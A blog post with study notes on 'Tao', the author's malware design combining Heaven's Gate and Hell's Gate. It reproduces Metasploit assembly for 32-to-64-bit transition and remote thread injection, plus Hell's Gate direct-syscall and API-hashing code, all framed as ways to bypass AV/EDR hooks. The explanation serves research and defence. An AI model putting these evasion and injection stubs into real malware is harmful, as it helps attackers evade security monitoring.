Tao: From Heaven to Hell, Alternation of Yin & Yang

Prologue - What is Tao

「一陰一陽之謂道。」——《周易》

In this blog, I’ll introduce Tao, the malware uses Heaven’s Gate and Hell’s Gate techniques. I’ll try to explain the principles behind each of these distinct malware techniques and show how I design Tao in Zig programming language.

By the way, this article is not my own research, it references plenty of other researchers’ findings. So it acts more like a note I took while learning from others’ research. If you got time, please take a look at those research, it’s really worth it. I’ll put the links below.

Let’s get started!

Cover Generated by GPT5

Ascending Through Heaven’s Gate, to Touch the Realm of x64

WoW64 Architecture

Windows 32 On Windows 64 (WoW64) is a built-in translator in 64-bit Windows to “translate” the 32-bit system interrupt to 64-bit.

WoW64 Transitioning

This graph is referenced from FireEye’s research in 2020. It shows that there must be 2 ntdll modules loaded in the memory (32-bit & 64-bit) of each WoW64 process. The functions in the loaded 32-bit ntdll module (as shown in the left) are the final system functions invoked by any Win32 API called by a 32-bit application running under the WoW64 architecture. However, on a native 64-bit system, 32-bit system interrupts cannot be executed directly. Therefore, the call edx instruction actually invokes the WoW64 translation layer, which translates the 32-bit system interrupt into a 64-bit system call and dispatches it to the corresponding system function in the 64-bit ntdll module (as shown on the right).

But why 64-bit system cannot understand the 32-bit system interrupt? It’s because the differences between their calling conventions. For example:

  1. Data Structure Layout:

    Obviously, the same data structure layout in memory of 32-bit & 64-bit machines will be so different, therefore, WoW64 architecture should put the correct content of all of the 32-bit data structures in the parameters into the same data structure on a 64-bit machine.

  2. Parameters Addressing Issues:

    In 32-bit calling convention, the parameters should be pushed onto the stack by the sequence, however, in the 64-bit calling convention, it should be placed at r8, r9, rcx, rdx, and then placed on the stack. So, the WoW64 architecture should place the 32-bit parameters following the x64 calling convention, that way, the 64-bit system calls can get the parameters from the place they expected.

RunSimulatedCode

Every WoW64 process is actually hosting 32-bit program within a native 64-bit process, it means all the WoW64 processes initially start as a 64-bit thread that performs a series of initialization tasks. It then transitions into 32-bit mode by calling a specific function, RunSimulatedCode exported by wow64cpu.dll, before finally jumping into the entry point of 32-bit program.

RunSimulatedCode

The graph is the assembly of RunSimulatedCode generated by Binary Ninja. There’s some important messages we can see through the code.

  1. It points the r12 register to address of current 64-bit TEB structure by gs:0x30.
  2. It points the r15 register to a pointer list TurboThunkDispatch in the global variables of wow64cpu.dll.
  3. In a 64-bit TEB structure, the offset +0x1488 of its base address is a 32-bit Thread Context structure. Here the function save this data into r13 register, and the structure here will be used as a snapshot of a 32-bit thread context.

For point 3, since a WoW64 process must frequently switch between 32-bit and 64-bit execution modes during runtime, each thread maintains a dedicated memory space to store its current execution context, such as instruction pointer, register states, and stack information.

The address of this context block is consistently stored at offset +0x1488 in the 64-bit TEB (Thread Environment Block). This detail is crucial and will be leveraged for exploitation later in this article.

TurboThunkDispatch

TurboThunkDispatch

We just said that TurboThunkDispatch is a list of pointers, and in this array, there’re 32 different function pointers. There’re 2 functions worth our attention.

  1. The CpupReturnFromSimulatedCode function serves as the first 64-bit entry point when transitioning back from 32-bit to 64-bit execution. Whenever a 32-bit program triggers a system interrupt by invoking a 32-bit system call, it enters this function exported by wow64cpu.dll. This function saves the current 32-bit thread context, then jumps to TurboDisPatchJumpAddressEnd, which in turn invokes the corresponding 64-bit ntdll function to emulate the intended system call.
  2. The first function, TurboDispatchJumpAddressEnd, is responsible for invoking the translator function Wow64SystemServiceEx, which is exported by wow64.dll, to emulate the system interrupt. After the emulation is complete, it restores the thread context from the previously saved state and returns execution to the 32-bit application’s return address, allowing it to continue execution seamlessly.

Heaven’s Gate

Heaven’s Gate utilizes the CS (code segment) register to hold different segment selectors to let the Intel CPU switch from 32-bit mode to 64-bit mode. Different CS register value will affect Intel CPU to parse the instructions with different instructions set.

  • 0x23
    • 32-bit thread mode in WoW64 process
  • 0x33
    • Native 64-bit thread
  • 0x1B
    • Native 32-bit thread

The process will perform a far jump to 0x33 segment to execute the desired 64-bit instructions, then return to 32-bit mode by jumping back to 0x23 segment. This technique allows a 32-bit process to obtain 64-bit capabilities.

There’re several advantages to use Heaven’s Gate in our malware, including but not limited to the following.

  1. Run 64-bit code right through our 32-bit program by WoW64:

    Don’t need a 64-bit executable or process to do 64-bit operations, we can use Heaven’s Gate to do the same.

  2. Bypass some AV/EDR detections:

    Some AV/EDR will focus on hooking the 32-bit ntdll.dll since our program is 32-bit, so when we switch to 64-bit and use 64-bit ntdll.dll, it can bypass the API hooks.

Heaven’s Gate Implementation

execute64.asm

To implement Heaven’t Gate, we can utilize the code from Metasploit Meterpreter. The following is the execute64.asm that they provided.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP
; Architecture: wow64
; Version: 1.0 (Jan 2010)
; Size: 75 bytes
; Build: >build.py executex64
;-----------------------------------------------------------------------------;

; A simple function to execute native x64 code from a wow64 (x86) process.
; Can be called from C using the following prototype:
;     typedef DWORD (WINAPI * EXECUTEX64)( X64FUNCTION pFunction, DWORD dwParameter );
; The native x64 function you specify must be in the following form (as well as being x64 code):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );

; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.

[BITS 32]

WOW64_CODE_SEGMENT EQU 0x23
X64_CODE_SEGMENT EQU 0x33

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.

 mov ax, ds        ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
 mov ss, ax        ; found and fixed by ReWolf, incorporated by RaMMicHaeL

 add esp, (8+4+8)      ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64
 pop edi         ; restore the clobbered registers
 pop esi         ;
 pop ebp         ; restore EBP
 retn (4*2)        ; return to caller (cleaning up our two function params)

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

Dissecting execute64.asm

In the start label, the function performs a function prologue to preparing the registers and the parameters to be passed to the function.

start:
 push ebp         ; prologue, save EBP...
 mov ebp, esp       ; and create a new stack frame
 push esi        ; save the registers we shouldn't clobber
 push edi        ;
 mov esi, [ebp+8]      ; ESI = pFunction
 mov ecx, [ebp+12]      ; ECX = dwParameter
 call delta        ;

It uses a common shellcode trick to obtain the current instruction pointer by calling the delta function. This call will push the address of next instruction (return address) onto the stack, then at the delta label, pop eax will get this address and saved it into the eax. This technique then effectively obtains the current memory address or instruction pointer of the shellcode, which can be used for further calculations or adjustments.

The following code is used to “calculate the address of native_x64 dynamically”, the (native_x64-delta) is the offset that known in the compilation time, with the current address we get by pop eax, we can calculate the absolute address of native_x64.

 call delta        ;
delta:
 pop eax         ;
 add eax, (native_x64-delta)    ; get the address of native_x64

When it’s ready to execute the native_x64 instructions, Heaven’s Gate is used to switch to 64-bit mode and execute the code. This is done by setting up a far jump, which uses the following code format.

jmp segment:offset
; [edx]     = offset (low 4 bytes)
; [edx+4]   = segment selector (high 2 bytes)

So it’s equals to

jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

And to prepare this far jump, the code will push the offset and segment selector onto the stack, then use the far jump instruction. The go_all_native funciton will enter and execute the selected 64-bit function code with the passed arguments in 64-bit mode, which is the entry point of the Heaven’s Gate.

When the 64-bit code is completed, it returns to the position where go_all_native is called. Before performing the far jump, the code will pop out the return address from stack and save it to edi, this is the technique to manually store the return address. This saved return address is later used to jump back from 64-bit mode to 32-bit mode using Heaven’s Gate technique. So let’s see the implementation in assembly.

X64_CODE_SEGMENT EQU 0x33
 ...
 sub esp, 8        ; alloc some space on stack for far jump
 mov edx, esp       ; EDX will be pointer our far jump
 mov dword [edx+4], X64_CODE_SEGMENT  ; set the native x64 code segment
 mov dword [edx], eax     ; set the address we want to jump to (native_x64)

 call go_all_native      ; perform the transition into native x64 and return here when done.
 ...

go_all_native:
 mov edi, [esp]       ; EDI is the wow64 return address
 jmp dword far [edx]      ; perform the far jump, which will return to the caller of go_all_native

The native_x64 code is written as 64-bit assembly to execute under 64-bit processor mode. It’ll calls the specified function pointer with the given parameter s. After executing the given function pointer, it’ll prepare to call another far jump to switch back to 32-bit mode. In this case, it uses 0x23 as the CS value and the WoW64 return address stored in rdi before to go back to the original 32-bit mode utilizing the Heaven’s Gate technique.

WOW64_CODE_SEGMENT EQU 0x23
...
native_x64:
[BITS 64]         ; we are now executing native x64 code...
 xor rax, rax       ; zero RAX
 push rdi        ; save RDI (EDI being our wow64 return address)
 call rsi        ; call our native x64 function (the param for our native x64 function is allready in RCX)
 pop rdi         ; restore RDI (EDI being our wow64 return address)
 push rax        ; simply push it to alloc some space
 mov dword [rsp+4], WOW64_CODE_SEGMENT ; set the wow64 code segment
 mov dword [rsp], edi     ; set the address we want to jump to (the return address from the go_all_native call)
 jmp dword far [rsp]      ; perform the far jump back to the wow64 caller...

Through the execute64.asm stub, we gain a clearer understanding of how Heaven’s Gate is implemented and how it enables the execution of native 64-bit code from a WoW64 process.

remotethread.asm

In this section, we will go through the remotethread.asm stub from Metasploit Framework, which will open a remote thread on a target process in 64-bit mode. Before we start, we need to define a structure specifically for x64 environment, instead of x86, and this structure will be passed to the 64-bit function.

This structure contains the process handle, the starting address of the remote shellcode, the parameters for the shellcode, and a field to save the thread handle when the remote thread is successfully created. This structure is named WOW64CONTEXT and this is how it looks like.

typedef struct _WOW64CONTEXT {
    union {
        HANDLE hProcess;
        BYTE   bPadding2[8];
    } h;  // this is the process handle

    union {
        LPVOID lpStartAddress;
        BYTE   bPadding1[8];
    } s;  // the starting address of remote shellcode

    union {
        LPVOID lpParameter;
        BYTE   bPadding2[8];
    } p;  // parameters for the shellcode

    union {
        HANDLE hThread;
        BYTE   bPadding2[8];
    } t;  // saved thread handle once the thread is created
} WOW64CONTEXT, * PWOW64CONTEXT;

In the structure above, each entry is padded to 8 bytes so that there’s enough space to save 64-bit addresses and the handles. The hThread is regarded as an output parameter where we can get the remote thread handle from. The assembly stub below will prepare the environment and the parameters first, then call RtlCreateUserThread function. After executing the function, the stub will check the return value to determine if the remote thread is created successfully. That function will return a boolean to indicate success or failure, if successful, a new thread will be injected into the target process in a suspended state.

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
; Architecture: x64
; Version: 1.0 (Jan 2010)
; Size: 296 bytes
; Build: >build.py remotethread
;-----------------------------------------------------------------------------;

; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.

; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );


[BITS 64]
[ORG 0]
    cld                    ; Clear the direction flag.
    mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
    mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
    and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
delta:                     ;
%include "./src/block/block_api.asm"
start:                     ;
    pop rbp                ; Pop off the address of 'api_call' for calling later.
    ; setup the parameters for RtlCreateUserThread...
    xor r9, r9             ; StackZeroBits = 0
    push r9                ; ClientID = NULL
    lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
    push rax               ; ThreadHandle = &ctx->t.hThread
    push qword [rsi+16]    ; StartParameter = ctx->p.lpParameter
    push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
    push r9                ; StackCommit = NULL
    push r9                ; StackReserved = NULL
    mov r8, 1              ; CreateSuspended = TRUE
    xor rdx, rdx           ; SecurityDescriptor = NULL
    mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
    ; perform the call to RtlCreateUserThread...
    mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" )
    call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
    test rax, rax          ; check the NTSTATUS return value
    jz success             ; if its zero we have successfully created the thread so we should return TRUE
    mov rax, 0             ; otherwise we should return FALSE
    jmp cleanup            ;
success:
 mov rax, 1             ; return TRUE
cleanup:
    add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
    mov rsp, rdi           ; restore the stack
    ret                    ; and return to caller

You can read the assembly by reading the comments beside each line, since it’s not so related to Heaven’s Gate, I’ll leave it to you to understand the code on your own.

To make this even easier to understand, the above assembly can be simplified into the following pseudo C code.

BOOL Function64( PWOW64CONTEXT ctx ) {
 if ( !NT_SUCCESS( RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL ) ) ) {
  return FALSE;
 } else {
  return TRUE;
 }
}

So now you should know how Heaven’s Gate works and how to implement it using assembly, let’s dive into the Hell’s Gate.

From Heaven We Descend, into the Depths of Hell

System Calls in Windows

The most common way to call the Windows system call is to call the regular Windows API. The Windows API is usually contains the implementation of the system calls. For example, when a programmer calls CreateFile, the program will actually calls NtCreateFile in the inner implementation.

All of the system calls return an NTSTATUS value that represent the error code. For example, STATUS_SUCCESS is returned if the operation is successful performed.

Most of the system calls are not documented by Microsoft, therefore lots of people reverse engineered the binaries and mark them down in unofficial documentations. These are a few of them.

Most of the system calls are exported from the ntdll.dll. Using system calls can provide more options than standard APIs do. Also, it can evades some host-based security solutions.

Zw/Nt System Calls

There are 2 types of system calls in Windows, with prefixes Zw and Nt.

Nt system calls are the main interface for user mode programs. Those are the system calls that most Windows application used. On the other hand, Zw system calls are lower level, kernel mode interface, usually used by device driver and other kernel codes that need direct access to the OS.

Although they both can be called from user mode and achieve the same functionality, the Nt and Zw functions actually use the same address in the memory, which means they’re actually the same implementation inside. We can use the following C code to prove & validate the fact.

#include <stdio.h>
#include <windows.h>

typedef NTSTATUS (NTAPI *NtAllocateVirtualMemory_t)(
    HANDLE    ProcessHandle,
    PVOID     *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T   RegionSize,
    ULONG     AllocationType,
    ULONG     Protect
);

int main() {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) {
        printf("Failed to load ntdll.dll\n");
        return 1;
    }

    FARPROC pNt = GetProcAddress(ntdll, "NtAllocateVirtualMemory");
    FARPROC pZw = GetProcAddress(ntdll, "ZwAllocateVirtualMemory");

    if (!pNt || !pZw) {
        printf("Failed to get function addresses.\n");
        return 1;
    }

    printf("NtAllocateVirtualMemory address: %p\n", pNt);
    printf("ZwAllocateVirtualMemory address: %p\n", pZw);

    if (pNt == pZw) {
        printf("[+] They point to the same function!\n");
    } else {
        printf("[-] They are different!\n");
    }

    return 0;
}

// Output:
// NtAllocateVirtualMemory address: 00007ffc24b8d7e0
// ZwAllocateVirtualMemory address: 00007ffc24b8d7e0
// [+] They point to the same function!

System Service Number (SSN)

Each system call has a special number called system service number (SSN), they’re just like syscall numbers in Linux. This is an identifier used in the system internal to represent which system services is being mentioned, such as memory allocation, read/write to files, etc. It’s not for the developers, it’s for the system kernel. When we try to perform a system call from user mode, we will set the SSN through eax or rax depending on 32-bit or 64-bit, so that the kernel will know which system service we’re going to use.

One thing that worth to be noticed is that the SSN will vary from Windows to Windows and version to version. Unlike syscall number on Linux, it’s not a fixed number, different Windows build will rearrange the position of the system services, so we cannot hardcode the SSN value in our code.

But in a same machine, the SSN numbers are not completely random, instead, there’s a relation between them. Each system call number in memory is equal to the previous SSN + 1. You can see the following graph to get what it means.

SSN

As you can see in the graph, all the system calls have the same structure, we can see the code snippet below to see the system call pattern.

mov r10, rcx
mov eax, <SSN>
syscall
ret

In 64-bit Windows calling convention, the first parameter is stored in rcx, but syscall instruction expected the parameter stored in r10 register, so we use mov r10, rcx to fullfill the syscall expectation. After this, the SSN will be moved into the eax register, then call the syscall to trigger the function we need.

For 64-bit systems, we use syscall instruction to trigger the system call and sysenter on 32-bit systems instead. Executing the syscall instruction will cause the process transfer the control from user mode to kernel mode. The kernel will then execute the requested action and return the control back to user mode once it’s completed.

But if you see the instructions in the graph again, you can see that there’s also 2 instructions in it, which are test and jne. They exists because of the WoW64 architecture, to let 32-bit process can run on 64-bit machine. When the process/program itself is 64-bit, those instructions won’t affect the normal control flow.

Hell’s Gate

Hell’s Gate is a technique to use direct system calls. As we just said, SSN is either hardcoded in the program or retrieved in the runtime using the sorting system calls address method. But Hell’s Gate, on the other hand, takes a different approach, it dynamically obtains the SSN from ntdll at runtime. We can take several ways to achieve this.

  • Using GetModuleHandleA and GetProcAddress
  • PEB (Process Environment Block) walk combined with EAT (Export Address Table) parsing

The easiest way to do this is the first one, we can get the base address of ntdll.dll first by using GetModuleHandleA and then use GetProcAddress to retrieve the memory address of the native function in ntdll.dll. But in an OPSEC perspective, it’s not the best approach since if the AV/EDR hooked either of GetModuleHandleA or GetProcAddress, then we’re done. Therefore, Hell’s Gate is coming, which takes the second method.

Hell’s Gate Implementation

Here we’re going to look at the original implementation of Hell’s Gate, written in C by @am0nsec & @RtlMateusz.

Hell’s Gate Structures

In the assembly code of Hell’s Gate, there’re 2 defined structures called _VX_TABLE_ENTRY and _VX_TABLE. Let’s see the first one first.

typedef struct _VX_TABLE_ENTRY {
 PVOID   pAddress;             // The memory address of a syscall function
 DWORD64 dwHash;               // The hash value of the syscall name
 WORD    wSystemCall;          // The SSN of the syscall
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

Based on _VX_TABLE_ENTRY, _VX_TABLE holds the 3 different fields of each entry in the table, and each entry indicates an system call (native function) that used in Hell’s Gate. So the _VX_TABLE contains all the data we need to perform the Hell’s Gate direct system call just like a function table, and this is its code.

typedef struct _VX_TABLE {
 VX_TABLE_ENTRY NtAllocateVirtualMemory;
 VX_TABLE_ENTRY NtProtectVirtualMemory;
 VX_TABLE_ENTRY NtCreateThreadEx;
 VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;

Hell’s Gate Functions

After knowing the structures of the Hell’s Gate, we can now dive into the functions of it.

RtlGetThreadEnvironmentBlock

TEB (Thread Environment Block) is the data structure of each thread, it contains a lot of information about that thread. On Windows, TEB also includes the pointer of PEB (Process Environment Block) and then PEB includes the information of the DLL, for example ntdll.dll. Since Hell’s Gate need to know the base address of ntdll.dll, so we gonna start from getting the TEB.

PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
 return (PTEB)__readgsqword(0x30);
#else
 return (PTEB)__readfsdword(0x16);
#endif
}

This function first checks the _WIN64 macro to determine if the program is being compiled for a x64 Windows system. If so, then it’ll use the intrinsic function __readgsqword to read a qword (64-bit) from the offset 0x30 in the GS segment, which contains the TEB on 64-bit Windows. Besides, if the code is compiled for a x86 Windows (_WIN64 is not defined), then it’ll use __readfsdword to get a dword (32-bit) from the offset 0x16 in the FS segment, which contains the TEB on 32-bit Windows. After this, it’ll then return the pointer to TEB (PTEB).

GetImageExportDirectory

This function is simple, given the base address of a PE module, it’ll locate and retrieve its export directory (_IMAGE_EXPORT_DIRECTORY). Hell’s Gate will later use this function to get the _IMAGE_EXPORT_DIRECTORY of the ntdll.dll module.

BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
 // Get DOS header
 PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
 if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
  return FALSE;
 }

 // Get NT headers
 PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
 if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
  return FALSE;
 }

 // Get the EAT
 *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
 return TRUE;
}

First, it’ll get the DOS header of the PE module then check if the e_magic field of the IMAGE_DOS_HEADER structure is IMAGE_DOS_SIGNATURE, which is 0x5A4D for “MZ” in hex. If it’s not the correct value, return FALSE.

Next, it’ll get the NT headers in the second part. The e_lfanew is an important member in the DOS header, it represents the NT headers offset in the file (or memory image). Here it first cast the pModuleBase to a pointer to a byte, then add it with e_lfanew to get the position of NT headers. Then it’ll validate the Signature of the NT headers should be equal to IMAGE_NT_SIGNATURE, which is 0x00004550 for “PE\0\0” in hex.

Last but not least, it’ll retrieve the EAT and save it in the ppImageExportDirectory variable. The pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress represents the virtual address of the export table, and since it’s an RVA (Relative Virtual Address), we need to add pModuleBase to make it a real (absolute) memory address. Finally, it’ll cast this address to PIMAGE_EXPORT_DIRECTORY, which is a pointer to _IMAGE_EXPORT_DIRECTORY, and return true.

djb2

DWORD64 djb2(PBYTE str) {
 DWORD64 dwHash = 0x7734773477347734;
 INT c;

 while (c = *str++)
  dwHash = ((dwHash << 0x5) + dwHash) + c;

 return dwHash;
}

The value of dwHash can be modified, it’s just a seed of djb2 algorithm. I do modify the value in my personal code, since I think this value may be easily detected by the AV/EDR. This function will calculate a hash for a given string input. This function is used for the API hashing technique. It’ll hash each function name in the EAT and compared to the pre-defined hash value to find the function we need.

GetVxTableEntry

This function is relatively large, we’ll devide it into 2 parts to explain. Let’s take a quick review of the previous workflow first.

If you remember what we just mentioned, we need to get the base address of ntdll.dll by getting the PEB from TEB, and this is wrapped in RtlGetThreadEnvironmentBlock function. After that, we’ll use GetImageExportDirectory to get the export directory from ntdll.dll. As we demonstrated in previous sections, this is done by parsing the DOS and NT headers. Next, for each system call, we calculate the hash of it and initialize the dwHash member with its corresponding value, for example NtAllocateVirtualMemory.dwHash.

Everytime we finish an initialization, the GetVxTableEntry function will be called. In this part, it’ll search for a djb2 hash that equals the pre-defined hashes we calculated before. Those pre-defined hashes are calculated from the system calls we needed, I prefer to them target function here. So once there’s a match for the hash of any of target function, it’ll save the address of current system call into pVxTableEntry->pAddress.

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
 PDWORD pdwAddressOfFunctions    = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
 PDWORD pdwAddressOfNames        = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
 PWORD pwAddressOfNameOrdinales  = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
    // I think pwAddressOfNameOrdinales is a typo from original code

 for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
  PCHAR pczFunctionName  = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
  PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

  if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
   pVxTableEntry->pAddress = pFunctionAddress;

   // ... part 2
  }
 }

 return TRUE;
}

And the second part is the main part where Hell’s Gate trick belongs.

// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
 // check if syscall, in this case we are too far
 if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
  return FALSE;

 // check if ret, in this case we are also probaly too far
 if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
  return FALSE;

 // First opcodes should be :
 //    MOV R10, RCX
 //    MOV RCX, <syscall>
 if (*((PBYTE)pFunctionAddress + cw) == 0x4c
  && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
  && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
  && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
  && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
  && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
  BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
  BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
  pVxTableEntry->wSystemCall = (high << 8) | low;
  break;
 }

 cw++;
};

After the pFunctionAddress is found, it’ll enter a while loop to search for the 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00 bytes, which are opcodes of mov r10, rcx and mov eax, SSN, representing the starting bytes of an unhooked system call. But in case the system call is hooked, the opcodes may not match since AV/EDR will inject the hook before the syscall instruction. To bypass this, Hell’s Gate declares a variable called cw, if there’s no match found, it’ll add cw by 1, which make the address of the system call increased by the offset cw on the next loop iteration. This progress will keep going until the mov r10, rcx and mov eax, SSN opcodes are found. It’ll keep sliding down until the instructions pattern matched. This image illustrates how it finds the opcodes by traversing the addresses.

Hell's Gate Search Path

To avoid itself from searching too over and get the wrong SSN from other system calls, there’re 2 if-statements at the beginning of the while loop to check if the current instruction is syscall or ret. Those 2 instructions are at the bottom of a system call stub, if you remember. If 1 of those 2 instructions is met, but haven’t encountered 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00 yet, it’ll return FALSE.

On the other hand, if there’s a successful match for those opcodes, Hell’s Gate will calculate its SSN and store it to pVxTableEntry->wSystemCall. The function use the left shift operator to shift the high variable to the left 8 times and then do a bitwise OR with low variable. This is due to little-endian, so the lower bytes of mov eax, SSN is low and the higher is high, after the operation, the higher bytes will be on the left and the lower bytes on the right (little-endian). Let’s use the following example to let you better understand this. In this example, we’re going to use NtAllocateVirtualMemoryEx as our target to calculate the SSN.

NtAllocateVirtualMemoryEx

In this graph, we can see the opcodes of mov r10, rcx is 4c6bd1 and the one of mov eax, 0x76 is b876000000. So if we put this opcodes into a table, it’ll be like this.

opcodeoffset
4c0
6b1
d12
b83
764
005
006
007

We take a look again at the SSN calculation code here.

BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;

So here the high will be offset 5, which is 00; the low will be offset 4, which is 76. Then we can use ipython to calculate (high << 8) | low. This is the value we got. It’s indeed the SSN 0x76.

In [1]: hex((0x00 << 8) | 0x76)
Out[1]: '0x76'

hellsgate.asm

Besides the C code, there’s also an assembly in the original Hell’s Gate implementation. In this assembly, Hell’s Gate defines 2 external functions called HellsGate and HellsDescent, which will be used to setup and execute the direct system calls.

; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)

.data
 wSystemCall DWORD 000h      ; global variable to keep the SSN

.code
 HellsGate PROC
  mov wSystemCall, 000h
  mov wSystemCall, ecx    ; move `ecx` (input argument) to wSystemCall
  ret
 HellsGate ENDP

 HellDescent PROC
  mov r10, rcx
  mov eax, wSystemCall    ; `wSystemCall` is now the SSN of the system call

  syscall
  ret
 HellDescent ENDP
end

The HellsGate function takes 1 argument, which is the SSN. It first use mov wSystemCall, 000h to initialize the value to be 0, then use mov wSystemCall, ecx to save the ecx to it, here ecx is the SSN.

The second one HellDescent is used to perform the actual system call. In x64 Windows calling convention, the syscall instruction expected the SSN to be in the eax register and the parameters to be in rcx, rdx, r8, r9. In HellDescent, it’ll move the value in rcx to r10, since the syscall instruction will overwrite the rcx register and load the SSN to eax from wSystemCall variable. After this, it’s ready for the syscall instruction, this will directly enter ring 0 to call the system service.

To integrate all the functions above and call a system call, you can see the code of the Payload function from the original implementation. But since it’s not used in Tao, we’ll skip this part and leave it to you.

Yin & Yang, the Eternal Tao of Duality

Tao uses Heaven’s Gate & Hell’s Gate at a same time to try to bypass the AV/EDR detection. It can not only evades the API hooks from security solutions but also bypass the WoW64 layer interception, allowing it to directly execute 64-bit syscalls and completely avoid user-mode monitoring.

For people who think “talk is cheap, show me the code”, here you are. Be aware of that you should declare the Windows structures and use extern keyword to get the native Windows API by yourself in Zig.

Tao is still in the very early stages of development, so some parts of the code and the build process may undergo significant changes in the future. This article only records the design process of the initial version.

Why Heaven & Hell

There’s a lot of methods to perform the direct system call, but why I want to choose Hell’s Gate? It’s because Hell’s Gate can dynamically retrieve the SSN, but something like Syswhispers will need to update the SSN table for different version and different bulid for Windows. Therefore, the Hell’s Gate is the best way to write the cross version direct system calls.

Prerequisites

Donut is a tool that can turn EXE into shellcode. This is its decription on GitHub.

